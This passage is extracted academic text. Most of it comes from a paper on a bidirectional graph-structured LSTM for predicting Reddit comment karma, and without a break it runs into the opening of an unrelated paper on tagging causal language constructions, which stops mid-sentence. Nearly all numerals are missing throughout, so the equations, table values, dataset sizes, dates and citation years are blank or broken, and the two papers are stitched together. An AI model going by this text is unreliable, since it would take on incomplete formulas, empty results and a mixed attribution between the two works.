model on the pop- ularity prediction task using reddit discussions; and analysis of the performance gains, particularly with respect to the role of language context. method the proposed model is a bidirectional graph lstm that characterizes a full threaded discussion, assum- ing a tree-structured response network and account- ing for the relative order of the comments. each comment in a conversation corresponds to a node in the tree, where its parent is the comment that it is re- sponding to and its children are the responding com- ments that it spurs ordered in time. each node in the tree is represented with a single recurrent neural net- work (rnn) unit that outputs a vector (embedding) that characterizes the interim state of the discussion, analogous to the vector output of an rnn unit which characterizes the word history in a sentence. in the forward direction, the state vector can be thought of as a summary of the discussion pursued in a partic- ular branch of the tree, while in the backward di- rection the state vector summarizes the full response subtree that followed a particular comment. the state vectors for the forward and backward direc- tions are concatenated for the purpose of predicting comment karma. the rnn updates – both forward and backward – incorporate both temporal and hier- archical (tree-structured) dependencies, since com- menters typically consider what has already been said in response to a parent comment. hence, we refer to it as a graph-structured rnn rather than a tree-structured rnn. figures (a) and (b) show an example of the state connections associated with hi- erarchical and timing structures for the forward and backward rnns, respectively. the supervision signal in training will impact the character of the state vector, and the forward and backward state sub-vectors are likely to capture dif- ferent phenomena. here, the objective is to predict quantized comment karma. we anticipate that the forward state will capture relevance and informa- tiveness of the comment, and the backward process will capture sentiment and richness of the ensuing discussion. the specific form of the rnn used in this work is an lstm. the detailed implementation of the model is described in the sections to follow. . graph-structured lstm each node in the tree is associated with an lstm unit. the input xt is an embedding that can incorpo- rate both comment text and local submission context features associated with thread structure and timing, described further in section . . the node state vec- tor ht is generated using a modification of the stan- dard lstm equations to include both hierarchical and timing structures for each comment. specifi- cally, we use two forget gates - one for the previous (or subsequent) hierarchical layer, and one for the previous (or subsequent) timing layer. in order to describe the update equations, we introduce notation for the hierarchical and timing structure. in figure , the nodes in the tree are num- bered in the order that the comments are contributed in time. to characterize graph structure, let π(t) de- note the parent of t and κ(t) its first child. time structure is represented only among a set of siblings: p(t) is the sibling predecessor in time, and s(t) is the sibling successor. the pointers κ(t), p(t) and s(t) are set to ∅ when t has no child, predecessor, or suc- cessor, respectively. for example, in figure (a), the node t will have π(t ) = t , κ(t ) = t , p(t ) = ∅ and s(t ) = t , and the node t will have π(t ) = t , κ(t ) = ∅, p(t ) = t and s(t ) = t . below we provide the update equations for the forward process, using the subscripts i, f, g, c, and o for the input gate, temporal forget gate, hier- archichal forget gate, cell, and output, respectively. the vectors it, ft, and gt are the weights for new in- formation, remembering old information from sib- lings, and remembering old information from the parent, respectively. σ is a sigmoid function, and ◦ indicates the hadamard product. if p(t) = ∅, then hp(t) and cp(t) are set to the initial state value. it = σ(wixt + uihp(t) + vihπ(t) + bi) ft = σ(wfxt + ufhp(t) + vfhπ(t) + bf) gt = σ(wgxt + ughp(t) + vghπ(t) + bg) c̃t = wcxt + uchp(t) + vchπ(t) + bc ct = ft ◦ cp(t) + gt ◦ cπ(t) + it ◦ c̃t ot = σ(woxt + uohp(t) + vohπ(t) + bo) ht = ot ◦ tanh(ct) when the whole tree structure is known, we can take advantage of the full response subtree to bet- ter represent the node state. to that end, we define a backward lstm that has a similar set of update equations except that only the first child will pass the hidden state to its parent. specifically, the update equations are the same except that π(t) is replaced with κ(t), p(t) is replaced with s(t), and a different set of weight matrices and bias vectors are learned. let + and − indicate forward and backward em- beddings respectively. on top of the lstm unit, the forward and backward state vectors are concatenated and passed to a softmax layer to predict quantized karma levels: p(yt = j|x,h) = exp(w j s [h + t ;h − t ])∑ k= exp(w k s [h + t ;h − t ]) where x and h correspond to the set of input features and state vectors (respectively) for all nodes in the discussion. . input features the full model includes two types of features in the input vector, including non-textual features associ- ated with the submission context and the textual fea- tures of the comment at that node. the submission context features are extracted from the graph and metadata associated with the comment, motivated by prior work showing that context factors such as the forum, timing and au- thor of a post are very useful in predicting popular- ity. the submission context features include: • timing: time since root, time since parent (in hours), number of later comments, and number of previous comments • author: a binary indicator as to whether the au- thor is the original poster, and number of com- ments made by the author in the conversation • graph-location: depth of the comment (dis- tance from the root), and number of siblings • graph-response: number of children (direct replies to the comment), height of the sub- tree rooted from the node, size of that subtree, number of children normalized for each thread ( normalization techniques), subtree size nor- malized for each thread ( normalization tech- niques). two methods are used to normalize the subtree size and number of children to compensate for variation associated with the size of the discussion, specif- ically: i) subtract the mean feature value in the thread, and ii) divide by the square root of the rank of the feature value in the thread. these features are a superset of those used in fang et al. ( ). the subvector including all these fea- tures is denoted xst . the comment text features, denoted xct, are gen- erated using a simple average bag-of-words repre- sentation learned during the training: xct = n n∑ i= w ie where w ie is an embedding of the i-th word in the comment, and n is the number of words in the comment. comments longer than words were truncated to reduce noise associated with long com- ments, assuming that the early portion carries the most information. the percentage of the comments that exceed words is around %− % for the subreddits used in the study. in all experiments, the word embedding dimension is d = , and the vo- cabulary includes only words that occurred at least times in the dataset. the input vector xt is set to either xst or [x s t;x c t], depending on whether the experiment uses text. . pruning often the number of comments in a single subtree can be large, which leads to high training costs. a large percentage of the comments are low karma and minimally relevant for predicting karma of neigh- bors, and many can be easily identified with simple graph and timing features (e.g. having no replies or contributed late in the discussion). therefore, we introduce a preprocessing step that identifies com- ments that are highly likely to be low karma to de- crease the computation cost. we then assign these nodes to be level and prune them out of the tree, but retain a count of nodes pruned for use in a count- weighted bias term in the update to capture informa- tion about response volume. for detecting low karma comments, we train a simple svm classifier to identify comments at the karma level based on the submission context fea- tures. if a pruned comment leads to a disconnected graph (e.g., an internal node is pruned but not its children), then the comment is retained in the tree. in testing, all pruned comments are given a predicted level of and accounted for in the evaluation. the state updates have an additional bias term for any nodes that have subsequent sibling or children comments pruned. for example, consider figure , if nodes {t , t , t , t } are pruned, then t will have a modified forward update, and t , t will have a modified backwards update. at node t, define mκt to be the number of levels pruned below it, mpt as the number of immediately preceeding comments pruned in its subgroup (responding to the same par- ent), and mst as the number of subsequent comments pruned in its subgroup plus the non-initial comments in the associated subtrees. in the example above, mκ = , m s = , m s = , m p = , and all other m∗t = . the pointers are updated reflect the structure of the pruned tree, so p( ) = , s( ) = , s( ) = ∅. the bias vectors rκ, rp and rs are as- sociated with the different sets of nodes pruned. let + and − indicate forward and backward em- beddings, respectively. the forward update has an adjusted predecessor contribution (h+ p(t) + m p t rp). the backward update adds mst rs + m κ t rκ to either h− s(t) or h− κ(t) , depending on whether it is a time or hierarchical update, respectively. . training the objective function is minimum cross-entropy over the quantized levels. all model parame- ters are jointly trained using the adadelta optimiza- tion algorithm (zeiler, ). word embeddings subreddit comments threads vocab size askwomen . m . k k askmen . m . k k politics . m . k k table : data statistics. subreddit prec rec % pruned askwomen . . . askmen . . . politics . . . table : precision and recall of the pruning classifier and percentage of comments pruned. are initialized using word vec skip-gram embed- dings (mikolov et al., ) trained on all com- ments from the corresponding subreddit. the code is implemented in theano (team et al., ) and is available at https://github. com/vickyzayats/graph-lstm.we tune the model over different dimensions of the lstm unit, and use the performance on the development set as a stopping criteria for the training. experiments . data reddit is a popular discussion forum platform con- sisting of a large number of subreddits focusing on different topics and interests. in our study, we exper- imented with subreddits: askwomen, askmen, and politics. all the data consists of discussions made in the period between january , and january , . table shows the total amount of data used for each of the subreddits. for each subreddit, the threads were randomly distributed between training, development (dev) and test sets with the proportions of : : . the performance of the pruning classifier on the dev set is presented in table . . task and evaluation metrics reddit karma has a zipfian distribution, highly skewed toward the low-karma comments. since the rare high karma comments are of greatest interest in popularity prediction, fang et al. ( ) proposes a https://reddit.com task of predicting quantized karma (using a nonlin- ear head-tail break rule for binning) with evaluation using a macro average of the f scores for predict- ing whether a comment exceeds each different level. experiments reported here use this framework. specifically, all the comments with karma lower than are assigned to level , and each subsequent level corresponds to karma less than or equal to the median karma in the rest of the comments based on the training data statistics. each subreddit has quantized karma levels based on its karma distribu- tion. there are binary subtasks (does the comment have karma at level j or higher for j = , . . . , ), and the scoring metric is the macro average of f (j). for tuning hyperparameters and as a stopping cri- terion, we use a linearly weighted average of f scores to increase the weight on high karma com- ments, which gives slightly better performance for the high karma cases but has only a small effect on the macro average. . baseline and contrast systems we compare the graph lstm to a node-independent baseline, which is a feedforward neural network model consisting of input, hidden and softmax lay- ers. this model is a simplification of the graph- lstm model where there is no connection between nodes. the node-independent model characterizes a comment without reference to either the text of the comment that it is responding to or the comments reacting to it. however, the model does have in- formation on the size of the response subtree via the submission context input features. both node- independent and graph-structured models are trained with the same cost function and tuned over the same set of hidden layer dimensions. we contrast performance of both architectures with and without using the text of the comment it- self. as shown in fang et al. ( ), simply us- ing submission context features (graph, timing, au- thor) gives a strong baseline. in order to evaluate the role of each direction (forward or backward) in the graph-structured model, we also present re- sults using only the forward direction graph-lstm for comparison to the bidirectional model. in addi- tion, in order to evaluate the importance of the lan- guage of the comment itself vs. the language used in the rest of the tree, we perform an interpolation model text askwomen askmen politics indep no . . . graph no . . . indep yes . . . interp mix . . . graph(f) yes . . . graph yes . . . table : average f score of karma level prediction for node-independent (indep) vs. graph-structured (graph) models with and without text features; interp corresponds to an interpolation of the graph-structured model with- out text and the node-independent model with text; and graph(f) corresponds to a graph-structured model con- tains forward direction only. between the graph-lstm with no language features and the node-independent model with language fea- tures. the relative weight for the two models is tuned on the development set. . karma level prediction the results for the average f scores on the test set are presented in table . in experiments for all the subreddits, graph-structured models outperform the corresponding node-independent models both with and without language features. language features also give a greater performance gain when used in the graph-lstm models. the fact that the forward graph improves over the interpolated models shows that it is not simply the information in the current node that matters for karma of that node. finally, while the full model outperforms the forward-only version for all the subreddits, the gain is smaller than that obtained by the forward direction alone over the node-independent model, so the forward direction seems to be more important. the karma prediction results (f score) at the dif- ferent levels is shown in figure . while in askmen and askwomen subreddits the overall performance decreases for higher levels, the politics subreddit has an opposite trend. this may be due in part to the lower pruning recall in the politics subreddit, but fang et al. ( ) also observe higher performance for high karma levels in the politics subreddit. figure : f scores as a function of the quantized levels for different model configuration. analysis here, we present analyses aimed at better under- standing the behavior of the graph-structured model and the role of language in prediction. all analyses are performed on the development set. the anal- yses are motivated by considering possible scenar- ios that are exceptions to the easy cases, which are: i) comments that are contributed early in the discus- sion and spawn large subtrees, likely to have high karma, and ii) comments with small subtrees that typically have low karma. we hypothesized three scenarios where the bidirectional graph-lstm with text might be useful. one case is controversial com- ments, which have large subtrees but do not have high karma because of downvotes; these tend to have overprediction of karma when using only submis- sion context. the other two scenarios involve un- derprediction of karma when using only submission context. early comments associated with few chil- dren and a more narrow subtree (see the downward chain in figure ) may spawn popular new threads and benefit from the popularity of other comments in the thread (more readers attracted), thus having higher popularity than the number of children sug- gests. lastly, comments that are clever or humor- ous discussion endpoints might have high popularity but small subtrees. these two cases tend to differ in their relative timing in the discussion. . karma prediction vs. time the first study looked at where the graph-lstm provides benefits in terms of timing. we plot the average f score as a function of the contribution time in figure . as an approximation for time, we use the quantized number of comments made prior to the current comment. the plots show that the graph-structured model improves over the node- independent model throughout the discussion. rel- ative gains are larger towards the end of discussions where the node-independent performance is lower. a similar trend is observed when plotting average f as a function of depth in the discussion tree. while the use of text in the graph-lstm seems to help throughout the discussion, we hypothesized that there would be different cases where it might help, and these would occur at different times. in- deed, % of the comments that are overpredicted figure : average f scores as a function of time, approximated using the number of previous comments quantized in increments of . by more than levels by the node-independent model without text (controversial comments) occur in the first % of the discussion. comments that are underpredicted by more than occur throughout the discussion and are roughly uniform ( - %) over the first half of the discussion, but then quickly ramp down. high-karma comments are rare at the end of the discussion; less than % of the underpredicted comments are in the last %. . importance of responses in order to see how the model benefits from using the language cues in underpredicted and overpredicted scenarios, we look at the size of errors made by the graph-lstm model with and without text features. in figure , the x-axis indicates the error between the actual karma level and the karma level predicted by the graph-lstm using submission context fea- tures only. the negative errors represent the over- predicted comments, and the positive errors repre- sent the underpredicted comments. the y-axis rep- resents the average error between the actual karma level and the karma level predicted by the model using both submission context and language fea- tures.the x=y identity line corresponds to no benefit from language features. results are presented for the politics subreddit; other subreddits have similar trends but smaller differences for the underpredicted cases. we compare two models – bidirectional and for- ward direction graph-structured lstm – in order to understand the role of the language of the replies vs. the comment and its history. we find that, for the bidirectional graph-lstm model, language is help- ing identify overpredicted cases more than underpre- dicted ones. the forward direction model also out- performs the node-independent model, but has less benefit in overpredicted cases, consistent with our intuition that controversy is identifiable based on the responses. although the comment text input is sim- ply a bag of words, it can capture the mixed senti- ment of the responses. while it is not represented in the plot, larger er- rors are much less frequent. looking at average f as a function of the number of children (direct responses), we found that the graph-lstm mainly benefits nodes that have a small number of children, consistent with the two underprediction scenarios hypothesized. however, many underpredicted cases are not impacted, since errors due to pruning con- tribute to - % of the underpredicted cases, de- pending on the subreddit (highest for politics). this explains the smaller gains for the positive side of figure . . language use analysis to provide insights into what the model is learning about language, we looked at individual words asso- ciated with different categories of comments, as well as examples of the different error cases. for the word level analysis, we classified words in two different ways, again using the politics sub- reddit. first, we associate words in comments with zero or positive karma. for each word in the vocab- ulary, we calculate the probability of a single-word comment being level zero using the trained model with a simplified graph structure (a post and a com- ment) where all the inputs were set to zero except the comment text. the lists of positive-karma and zero- karma correspond to the words associated with the lowest and highest probability of zero-karma, re- spectively. we identified positive-karma and zero-karma reply words in a similar fashion, using a simplified graph with individual words us as inputs figure : the error between the actual karma level and the karma level predicted by the model using both submission context and language features. negative errors correspond to over-prediction; positive errors correspond to under- prediction. for the reply while predicting the comment karma. second, we identified words that may be indica- tive of comments that are over- and underpredicted by the graph-structured model without text and for which the graph-lstm model with text reduced the error by more than levels. specifically, we choose those words w in comments having the highest ratio r = p(w|t)/p(w), where t indicates an over- or un- derpredicted comment, subject to minimum occur- rence constraints ( for overpredicted comments, for underpredicted comments). the words with the highest ratio were chosen for each case and any words in both over- and underpredicted sets were eliminated, leaving words. again, this was re- peated for words in replies to over vs. underpre- dicted comments, but with a minimum count thresh- old of , resulting in words. the lists are noisy, similar to what is often found with the topic model, and colored by the language of the subreddit community, but a few trends can be observed. looking at the list of words associated with replies to positive-karma comments we noticed words that indicate humor (“lol”, “hilarious”), positive feedback (“like”, “right”), and emotion in- dicators (“!!”, swearing). words in comments and replies associated with overpredicted (controversial) cases are related to controversial topics (sexual, reg- ulate, liberals), named political parties, and men- tions of downvoting or indication that the comment has been edited with the word “edit.” since the two sets of lists were generated sepa- rately, there are words in the over/under-predicted lists that overlap with the zero/non-zero karma lists ( in the reply lists, in the comment lists). the majority of the overlap ( / words) is consistent figure : the mapping of the words in the comments to the shared space using t-sne in politics subred- dit. shown are the words that are highly associated with positive-karma, negative-karma, underpredicted and overpredicted comments. with the intuition that words on the underpredicted list should be associated with positive-karma, and words on the overpredicted list might overlap with the zero-karma list. rather than providing word lists, many neural net- work studies illustrate trends using word embed- ding visualization. the embeddings of the words from the union of lists for positive-karma, zero- karma, underpredicted and overpredicted comments and replies were together used to learn a t-sne map- ping. the results are plotted for comments in fig- ure , which shows that the words that are as- sociated with underpredicted comments (red) are aligned with positive-karma words (green) for both comment text and text in replies. words associated with overpredicted comments (blue) are more scat- tered, but they are somewhat more like the zero- karma words (yellow). the trends for words in replies are similar. table lists examples of the different error sce- narios with the reference karma and predictions of different models (node-independent without text, feedforward graph-lstm with text, and the full bilstm). the first two examples are overpredicted (controversial) cases, where ignoring text leads to a high karma prediction, but the reference is zero. in the first case, the forward model incorrectly predicts high karma because “republican” tends to be asso- ciated with positive karma. the model leveraging reply text correctly predicts the low karma. in the second case, the forward model captures reduces the prediction, but again having the replies is more help- ful. the next two cases are examples of underpredic- tion due to small subtrees. example is incorrectly labeled as level by the forward and no-text models, but because the responses mention “nice joke” and “accurate analogy,” the bidirectional model is able to identify it as level . example has only one child, but both models using language correctly pre- dict level , probably because the model has learned that references to “colbert” are popular. the next two examples are underpredicted cases from early in the discussion, many of which expressed an opin- ion that in some way provided multiple perspectives. finally, the last two examples represent instances where neither model successfully identifies a high karma comment, which often involve analogies. un- like the “titanic” analogy, these did not have suffi- cient cues in the replies. related work the problem of predicting popularity in social me- dia platforms has been the subject of several studies. popularity as defined in terms of volume of response has been explored for shares on facebook (cheng et al., ) and twitter (bandari et al., ) and twitter retweets (tan et al., ; zhao et al., ; bi and cho, ). studies on reddit predict karma as popularity (lakkaraju et al., ; jaech et al., ; he et al., ) or as community endorsement (fang et al., ). popularity prediction is a diffi- cult task where many factors can play a role, which is why most prior studies control for specific factors, including topic (tan et al., ; weninger et al., ), timing (tan et al., ; jaech et al., ), and/or comment content (lakkaraju et al., ). controlling for specific factors is useful in under- standing the components of a successful post, but it does not reflect a realistic scenario. studies that do not include such constraints have looked at twitter retweets (bi and cho, ) and reddit karma (he et al., ; fang et al., ). the work in (he et al., ) uses reinforcement learning to identify popular threads to track given the past comment history, so it is learning language cues relevant to high karma but it does not explicitly predict karma. in addition, it models relevance via an inner-product of past and new comment embed- dings, and uses an lstm to model inter-comment dependencies among a collection of comments irre- spective of their sibling-parent relationship, whereas the lstm in our work is over a graph that accounts for this relationship. the work most closely related to our study is fang et al. ( ). the node-independent baseline im- plemented in our study is equivalent to their feed- forward network baseline, but the results are not di- rectly comparable because of differences in training (we use more data) and input features. the most im- portant difference in our approach is the representa- tion of textual context using a bidirectional graph- lstm, including the history behind and responses to a comment. other differences are: i) fang et al. ( ) use an lstm to characterize comments, while our model uses a simple bag-of-words ap- proach, and ii) they learn latent submission context models to determine the relative importance of tex- tual cues, while our approach uses a submission con- text svm to prune low karma comments (ignoring their text). allowing for differences in baselines, we note that the absolute gain in performance from us- ing text features is larger for our model, which rep- resents language context. tree lstms are a modification of sequential lstms that have been proposed for a variety of sentence-level nlp tasks (tai et al., ; zhu et al., ; zhang et al., ; le and zuidema, ). the architecture of tree lstms varies depending on the task. some options include summarizing over the children, adding a separate forget gate for each ex karma comment republicans are fundamentally dishonest. (politics, id: x pcx) that is rape. she was drunk and could not consent. period. any of the supposed evidence otherwise is nothing but victim blaming. (askwomen, id: h pyh) the liberals keep saying the titanic is sinking but my side is feet in the air. (politics, id: upfgl) i miss your show, stephen colbert. (askmen, id: qmpzm) that is terrifying. they were given the orders to bust down the door without notice to the residents, thereby placing themselves in danger. and ultimately, placing the lives of the residents in danger (who would be acting out of fear and self-defense) (politics, id: wzwg ) it’s something, and also would change the way that police unions and state prosecutors work. i don’t fundamentally agree with the move, since it still necessitates abuse by the state, but it’s something. (politics, id: chxr) chickenhawks always talk a big game as long as someone else is doing the fighting. (poli- tics, id: wbgpd) [they] use statistics in the same way that a drunk uses lampposts: for support, rather than illumination. -andrew lang. (politics, id: yc fj) table : example comments and karma level predictions: reference, no text, graph(f), graph. child (tai et al., ), recurrent propagation among siblings (zhang et al., ), or use of stack lstms (dyer et al., ). our work differs from these studies in two respects: the tree structure here char- acterizes a discussion rather than a single sentence; and our architecture incorporates both hierarchical and temporal recursions in one lstm unit. conclusion in summary, this paper presents a novel approach for modeling threaded discussions on social media using a graph-structured bidirectional lstm which represents both hierarchical and temporal conversa- tion structure. the propagation of hidden state in- formation in the graph provides a mechanism for representing contextual language, including the his- tory that a comment is responding to as well as the ensuing discussion it spawns. experiments on reddit discussions show that the graph-structured lstm leads to improved results in predicting com- ment popularity compared to a node-independent model. analyses show that the model benefits pre- diction over the extent of the discussion, and that language cues are particularly important for distin- guishing controversial comments from those that are very positively received. responses from even a small number of comments seem to be useful, so it is likely that the bidirectional model would still be useful with a short-time lookahead for early predic- tion of popularity. while we evaluate the model on predicting the popularity of comments in specific forums on red- dit, it can be applied to other social media platforms that maintain a threaded structure or possibly to ci- tation networks. in addition to popularity predic- tion, we expect the model would be useful for other tasks for which the responses to comments are in- formative, such as detecting topic or opinion shift, influence or trolls. with the more fine-grained feed- back increasingly available on social media plat- forms (e.g. laughter, love, anger, tears), it may be possible to distinguish different types of popularity as well as levels, e.g. shared sentiment vs. humor. in this study, the model uses a simple bag-of- words representation of the text in a comment; more sophisticated attention-based models and/or feature engineering may improve performance. in addition, performance of the model on underpredicted com- ments appears to be limited by the pruning mecha- nism that we introduced. it would be useful to ex- plore the tradeoffs of reducing the amount of prun- ing vs. using a more complex classifier for prun- ing. finally, it would be useful to evaluate per- formance using a short window lookahead for re- sponses, rather than the full discussion tree. acknowledgments this paper is based on work supported by the darpa deft program. views expressed are those of the authors and do not reflect the official policy or position of the department of defense or the u.s. government. we thank the reviewers for their help- ful feedback. references roja bandari, sitaram asur, and bernardo huberman. . the pulse of news in social media: forecast- ing popularity. in proc. icwsm. bin bi and junghoo cho. . modeling a retweet network via an adaptive bayesian approach. in proc. www. justin cheng, lada adamic, p. alex dow, jon michael kleinberg, and jure leskovec. . can cascades be predicted? in proc. www. chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a. smith. . recurrent neural network grammars. in proc. naacl. hao fang, hao cheng, and mari ostendorf. . learning latent local conversation modes for predict- ing community endorsement in online discussions. in proc. socialnlp. ji he, mari ostendorf, xiaodong he, jianshu chen, jian- feng gao, lihong li, and li deng. . deep reinforcement learning with a combinatorial action space for predicting popular reddit threads. in proc. emnlp. aaron jaech, victoria zayats, hao fang, mari ostendorf, and hannaneh hajishirzi. . talking to the crowd: what do people react to in online discussions? in proc. emnlp. himabindu lakkaraju, julian j. mcauley, and jure leskovec. . what’s in a name? understanding the interplay between titles, content, and communities in social media. in proc. icwsm. phong le and willem zuidema. . compositional distributional semantics with long short term memory. in proc. *sem. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. in proc. iclr. kai sheng tai, richard socher, and christopher d man- ning. . improved semantic representations from tree-structured long short-term memory networks. in proc. acl. chenhao tan, lillian lee, and bo pang. . the ef- fect of wording on message propagation: topic- and author-controlled natural experiments on twitter. in proc. acl. the theano development team, rami al-rfou, guil- laume alain, amjad almahairi, christof anger- mueller, dzmitry bahdanau, nicolas ballas, frédéric bastien, justin bayer, anatoly belikov, et al. . theano: a python framework for fast computa- tion of mathematical expressions. arxiv preprint arxiv: . . trang tran and mari ostendorf. . characterizing the language of online communities and its relation to community recognition. in proc. emnlp. tim weninger, xihao avi zhu, and jiawei han. . an exploration of discussion threads in social news sites: a case study of the reddit community. in proc. asonam. matthew d zeiler. . adadelta: an adaptive learning rate method. arxiv preprint arxiv: . . xingxing zhang, liang lu, and mirella lapata. . top-down tree long short-term memory networks. in proc. naacl. qingyuan zhao, murat a erdogdu, hera y he, anand rajaraman, and jure leskovec. . seismic: a self-exciting point process model for predicting tweet popularity. in proc. sigkdd. xiaodan zhu, parinaz sobhani, and hongyu guo. . long short-term memory over recursive structures. in proc. icml. automatically tagging constructions of causation and their slot-fillers jesse dunietz computer science department carnegie mellon university pittsburgh, pa , usa jdunietz@cs.cmu.edu lori levin and jaime carbonell language technologies institute carnegie mellon university pittsburgh, pa , usa {lsl,jgc}@cs.cmu.edu abstract this paper explores extending shallow seman- tic parsing beyond lexical-unit triggers, using causal relations as a test case. semantic pars- ing becomes difficult in the face of the wide variety of linguistic realizations that causation can take on. we therefore base our approach on the concept of constructions from the linguistic paradigm known as construction grammar (cxg). in cxg, a construction is a form/function pairing that can rely on arbi- trary linguistic and semantic features. rather than codifying all aspects of each construc- tion’s form, as some attempts to employ cxg in nlp have done, we propose methods that offload that problem to machine learning. we describe two supervised approaches for tag- ging causal constructions and their arguments. both approaches combine automatically in- duced pattern-matching rules with statistical classifiers that learn the subtler parameters of the constructions. our results show that these approaches are promising: they significantly outperform naı̈ve baselines for both construc- tion recognition and cause and effect head matches. introduction historically, shallow semantic parsing has focused on tagging predicates expressed by individual lexical units. while this paradigm has been fruitful, tying meaning to lexical units excludes some essential se- mantic relationships that cannot be captured in such a representation. one domain that highlights the problem is causal relations. causation can be expressed in a tremen- . this bill promotes consolidation and coopera- tion among regulatory agencies. . such swelling can impede breathing. . we don’t have much time, so let’s move quickly. . she’s mad because i hid the car keys. . he died from a blocked artery. . making money is contingent on finding a good-paying job. . this decision opens the way for much broader application of the law. . for market discipline to work, banks cannot expect to be bailed out. . judy’s comments were so offensive that i left. table : examples of causal language, reflecting the anno- tation scheme described in § . (with connectives in bold, causes in small caps, and effects in italics). dous variety of linguistic forms (wolff et al., ). as exemplified in table , possibilities include verbs ( , ), prepositions/conjunctions ( , , ), adjectives ( ), and much more complex expressions. some of these trickier cases can be handled as idiomatic multi- word expressions (mwes; ). others ( , ), however, are more structured than typical mwes: they depend on particular configurations of syntactic relations and slot-fillers, placing them closer to the grammatical end of the continuum of lexicon and grammar. this diversity presents a problem for most se- mantic parsers, which inherit the restrictions of the representational schemes they are based on. many semantic annotation schemes limit themselves to the argument structures of particular word classes. for example, the penn discourse treebank (pdtb; transactions of the association for computational linguistics, vol. , pp. – , . action editor: christopher potts. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. prasad et al., ) includes only conjunctions and adverbials as connectives, and propbank (palmer et al., ) and verbnet (schuler, ) focus on verb arguments. framenet (baker et al., ; fill- more, ) is less restrictive, allowing many parts of speech as triggers. most importantly, though, all these representations share the fundamental simplifying assumption that the basic linguistic carrier of meaning is the lexical unit. some (e.g., pdtb and framenet) allow mwes as lexical units, and much work has been done on detecting and interpreting mwes (see baldwin and kim, ). but even these schemes overlook es- sential linguistic elements that encode meanings. in example , for instance, a lexical unit approach would have to treat so as encoding the causal relationship, when in fact so merely intensifies the adjective; it is the combination of so and the finite clausal comple- ment that indicates causality. a more general approach can be found in the prin- ciples of construction grammar (cxg; fill- more et al., ; goldberg, ). cxg posits that the fundamental units of language are construc- tions – pairings of meanings with arbitrarily com- plex linguistic forms. these forms are often produc- tive, consisting of some fixed elements combined with some open slots for semantic arguments. the form/meaning pairings can be as simple as those in traditional lexical semantics. the verb push, for in- stance, is paired with the meaning force to move, and the verb takes two linguistic arguments (sub- ject and object) corresponding to the two semantic arguments (pusher and pushee). but in cxg, the meaning-bearing forms can be much more complex: so x that y is a single construction, paired with the meaning x to an extreme that causes y. the cxg paradigm can anchor semantic interpre- tations to any constellation of surface forms, making it potentially invaluable for computational semantics. even as it has grown in prominence in linguistics, however, cxg has received relatively little attention in nlp. this is partly because the usual approach to operationalizing cxg is to rebuild the entire nlp pipeline to be “constructions all the way down” – to pdtb does include a catch-all altlex category that captures some additional constructions. however, these phrases are very unpredictable, as they include many words beyond the linguistic triggers. they are also restricted to relations between sentences. explicitly model the interactions and inheritance re- lationships between constructions that produce the final utterance and meaning. here, we take a different approach. instead of “constructions all the way down,” we propose a “con- structions on top” methodology: we use a con- ventional nlp pipeline for pos tagging, parsing, and so on, but add a layer for constructional phenomena that directly carry meaning. rather than specifying by hand the constraints and properties that charac- terize each construction, we allow machine learning algorithms to learn these characteristics. causal relations present an ideal testbed for this ap- proach. as noted above, causal relations are realized in extremely diverse ways, demanding an operational- ized concept of constructions. recognizing causal relations also requires a combination of linguistic analysis and broader world knowledge. additionally, causal relations are ubiquitous, both in our thinking and in our language (see, e.g., conrath et al., ). recognizing these relations is thus invaluable for many semantics-oriented applications, including tex- tual entailment and question answering (especially for “why” questions). they are especially helpful for domain-specific applications such as finance, politics, and biology (see, e.g., berant et al., ), where ex- tracting cause and effect relationships can help drive decision-making. more general applications like ma- chine translation and summarization, which ought to preserve stated causal relationships, can also benefit. in the remainder of this paper, we suggest two related approaches for tagging causal constructions and their arguments. we first review an annotation scheme for causal language and present a new corpus annotated using that scheme (§ ). we then define the task of tagging causal language, casting it as a construction recognition problem (§ ). because it is so hard to identify the relevant components of a construction (tenses, grammatical relations, etc.), the scheme and task do not explicitly include all of these elements. we instead tag the words that participate in a causal construction as a proxy for that construction. we leave it to annotators (when humans are annotat- ing) or machine learning (during automated tagging) to assess when the full constellation of constructional elements is present. next, we present causeway-l and causeway-s, two versions of a pipeline for performing this task, and compare the two approaches. both approaches use automatically induced patterns, either syntactic (§ . ) or lexical (§ . ), to find possible lexical trig- gers of causal constructions, as well as their likely arguments. they then apply a mix of construction- specific classifiers and construction-independent clas- sifiers to determine when causal constructions are truly present. we report on three sets of experiments (§ ) assessing the two systems’ performance, the im- pacts of various design features, and the effects of parsing errors. the results indicate the viability of the approach, and point to further work needed to improve construction recognition (§ ). causal language annotation scheme and corpus causation is a slippery notion (see schaffer, ), so the parameters of annotating causal language require careful definition. we follow the annotation scheme of dunietz et al. ( ), which we now briefly review. . causal language annotation scheme the scheme of dunietz et al. ( ) focuses specifi- cally on causal language – language used to appeal to psychological notions of cause and effect. it is not concerned with what causal relationships hold in the real world; rather, it represents what causal relationships are asserted by the text. for example, cancer causes smoking states a false causation, but it would nonetheless be annotated. on the other hand, the bacon pizza is delicious would not be annotated, even though bacon may in fact cause deliciousness, because the causal relationship is not stated. the scheme defines causal language as any con- struction which presents one event, state, action, or entity as promoting or hindering another, and which includes at least one lexical trigger. for each instance of causal language, up to three spans are annotated: • the causal connective (required) – the lexical items in the construction signaling the causal rela- tionship (e.g., because of ). the connective anno- tation includes all words whose lemmas appear in every instance of the construction. this excludes elements that can be absent, such as most copu- las, or classes of interchangeable words, such as determiners, whose lemmas can vary between in- stances. • the cause – generally a full clause or phrase ex- pressing an event or state of affairs (e.g., i attended because joan was the honoree). when an actor – but no action – is presented as the cause (e.g., i prevented a fire.), the actor is annotated as the cause. • the effect – also generally an event or state of affairs, expressed as a complete clause or phrase (e.g., i attended because of joan.). the cause and effect spans may be absent, e.g., in a passive or infinitive. several examples, with connectives, causes, and effects annotated, are shown in table . the scheme permits the connective to be discon- tinuous and arbitrarily complex (e.g., a necessary condition of or if is to ). annotators together established an informal “constructicon” to guide their decisions about what word patterns should be con- sidered connectives. note that the connective is not synonymous with the construction itself; rather, it is a lexical indicator of the presence of the construction. as noted above, we take the construction proper to in- clude the relevant grammatical relations, constraints on argument type, etc. to address causal language as independently as possible from other phenomena, and to circumscribe the scope of the annotations, several types of relation- ships are excluded: • causal relationships with no lexical trigger – e.g., john went home early; he felt ill. • connectives that incorporate a means or result – this includes lexical causatives such as kill (cause to die) and convince (cause via persuasion). only connectives denoting pure causation (e.g., cause, prevent, because) are annotated. • connectives that assert an unspecified causal 